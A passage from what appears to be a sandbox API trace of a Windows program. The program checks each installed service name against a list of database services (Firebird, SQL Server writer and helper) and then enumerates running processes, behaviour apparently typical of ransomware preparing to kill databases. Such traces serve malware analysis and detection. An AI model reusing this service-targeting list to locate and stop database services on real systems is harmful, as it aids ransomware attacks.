lpString2="Audiosrv") returned 1 [0169.270] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0169.270] lstrlenW (lpString="BFE") returned 3 [0169.270] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0169.270] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0169.271] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0169.271] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0169.271] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0169.271] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0169.271] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0169.271] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0169.271] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0169.271] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0169.271] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0169.271] lstrlenW (lpString="CDPSvc") returned 6 [0169.271] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0169.271] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0169.271] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0169.271] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0169.271] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0169.271] lstrlenW (lpString="ClickToRunSvc") returned 13 [0169.271] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0169.271] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0169.271] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0169.271] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0169.271] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0169.271] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0169.271] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0169.271] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0169.271] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0169.271] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0169.271] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0169.272] lstrlenW (lpString="CryptSvc") returned 8 [0169.272] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0169.272] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0169.272] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0169.272] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0169.272] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0169.272] lstrlenW (lpString="DcomLaunch") returned 10 [0169.272] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0169.272] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0169.272] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0169.272] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0169.272] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0169.272] lstrlenW (lpString="DeviceAssociationService") returned 24 [0169.272] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0169.272] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0169.272] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0169.272] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0169.272] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0169.272] lstrlenW (lpString="Dhcp") returned 4 [0169.272] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0169.272] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0169.272] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0169.272] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0169.272] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0169.272] lstrlenW (lpString="Dnscache") returned 8 [0169.272] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0169.272] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0169.273] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0169.273] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0169.273] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0169.273] lstrlenW (lpString="DPS") returned 3 [0169.273] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0169.273] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0169.273] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0169.273] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0169.273] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0169.273] lstrlenW (lpString="DusmSvc") returned 7 [0169.273] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0169.273] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0169.273] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0169.273] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0169.273] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0169.273] lstrlenW (lpString="EventLog") returned 8 [0169.273] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0169.273] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0169.273] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0169.273] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0169.273] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0169.273] lstrlenW (lpString="EventSystem") returned 11 [0169.273] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0169.274] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0169.274] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0169.274] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0169.274] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0169.274] lstrlenW (lpString="FontCache") returned 9 [0169.274] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0169.274] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0169.274] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0169.274] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0169.274] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0169.274] lstrlenW (lpString="gpsvc") returned 5 [0169.274] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0169.274] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0169.275] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0169.275] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0169.275] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0169.275] lstrlenW (lpString="iphlpsvc") returned 8 [0169.275] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0169.275] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0169.275] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0169.275] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0169.275] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0169.275] lstrlenW (lpString="KeyIso") returned 6 [0169.275] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0169.275] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0169.275] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0169.275] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0169.275] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0169.275] lstrlenW (lpString="LanmanServer") returned 12 [0169.275] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0169.275] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0169.275] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0169.275] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0169.275] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0169.275] lstrlenW (lpString="LanmanWorkstation") returned 17 [0169.275] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0169.275] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0169.275] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0169.275] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0169.275] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0169.276] lstrlenW (lpString="lfsvc") returned 5 [0169.276] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0169.276] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0169.276] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0169.276] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0169.276] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0169.276] lstrlenW (lpString="lmhosts") returned 7 [0169.276] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0169.276] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0169.276] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0169.276] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0169.276] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0169.276] lstrlenW (lpString="LSM") returned 3 [0169.276] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0169.276] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0169.276] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0169.276] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0169.276] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0169.276] lstrlenW (lpString="MpsSvc") returned 6 [0169.276] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0169.276] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0169.276] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0169.276] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0169.276] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0169.276] lstrlenW (lpString="NcbService") returned 10 [0169.276] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0169.276] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0169.277] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0169.277] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0169.277] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0169.277] lstrlenW (lpString="netprofm") returned 8 [0169.277] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0169.277] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0169.277] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0169.277] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0169.277] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0169.277] lstrlenW (lpString="NgcSvc") returned 6 [0169.277] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0169.277] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0169.277] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0169.277] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0169.277] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0169.277] lstrlenW (lpString="NlaSvc") returned 6 [0169.277] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0169.277] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0169.277] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0169.277] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0169.277] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0169.277] lstrlenW (lpString="nsi") returned 3 [0169.277] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0169.277] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0169.277] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0169.277] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0169.277] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0169.278] lstrlenW (lpString="PcaSvc") returned 6 [0169.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0169.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0169.278] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0169.278] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0169.278] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0169.278] lstrlenW (lpString="PlugPlay") returned 8 [0169.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0169.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0169.278] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0169.278] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0169.278] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0169.278] lstrlenW (lpString="Power") returned 5 [0169.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0169.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0169.278] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0169.278] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0169.278] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0169.278] lstrlenW (lpString="ProfSvc") returned 7 [0169.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0169.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0169.278] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0169.278] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0169.278] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0169.278] lstrlenW (lpString="RpcEptMapper") returned 12 [0169.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0169.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0169.279] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0169.279] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0169.279] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0169.279] lstrlenW (lpString="RpcSs") returned 5 [0169.279] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0169.279] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0169.279] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0169.279] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0169.279] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0169.279] lstrlenW (lpString="SamSs") returned 5 [0169.279] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0169.279] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0169.279] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0169.279] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0169.279] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0169.279] lstrlenW (lpString="Schedule") returned 8 [0169.279] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0169.279] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0169.279] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0169.279] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0169.279] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0169.279] lstrlenW (lpString="SecurityHealthService") returned 21 [0169.279] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0169.279] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0169.279] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0169.279] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0169.279] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0169.280] lstrlenW (lpString="SENS") returned 4 [0169.280] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0169.280] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0169.280] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0169.280] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0169.280] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0169.280] lstrlenW (lpString="ShellHWDetection") returned 16 [0169.280] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0169.280] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0169.280] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0169.280] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0169.280] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0169.280] lstrlenW (lpString="Spooler") returned 7 [0169.280] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0169.280] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0169.280] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0169.280] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0169.280] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0169.280] lstrlenW (lpString="StateRepository") returned 15 [0169.280] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0169.280] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0169.280] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0169.280] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0169.280] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0169.280] lstrlenW (lpString="SysMain") returned 7 [0169.280] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0169.281] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0169.281] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0169.281] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0169.281] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0169.281] lstrlenW (lpString="SystemEventsBroker") returned 18 [0169.281] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0169.281] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0169.281] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0169.281] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0169.281] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0169.281] lstrlenW (lpString="Themes") returned 6 [0169.281] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0169.281] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0169.281] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0169.281] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0169.281] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0169.281] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0169.281] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0169.281] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0169.281] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0169.281] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0169.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x46a4f50 | out: hHeap=0x6a0000) returned 1 [0169.281] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x484 [0169.285] Process32FirstW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0169.286] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0169.287] lstrlenW (lpString="System") returned 6 [0169.287] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0169.288] lstrlenW (lpString="smss.exe") returned 8 [0169.288] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0169.289] lstrlenW (lpString="csrss.exe") returned 9 [0169.289] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0169.731] lstrlenW (lpString="wininit.exe") returned 11 [0169.732] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0169.733] lstrlenW (lpString="csrss.exe") returned 9 [0169.733] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0169.734] lstrlenW (lpString="winlogon.exe") returned 12 [0169.734] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0169.735] lstrlenW (lpString="services.exe") returned 12 [0169.735] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0169.736] lstrlenW (lpString="lsass.exe") returned 9 [0169.736] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0169.737] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0169.737] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0169.737] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0169.737] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.738] lstrlenW (lpString="svchost.exe") returned 11 [0169.739] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, 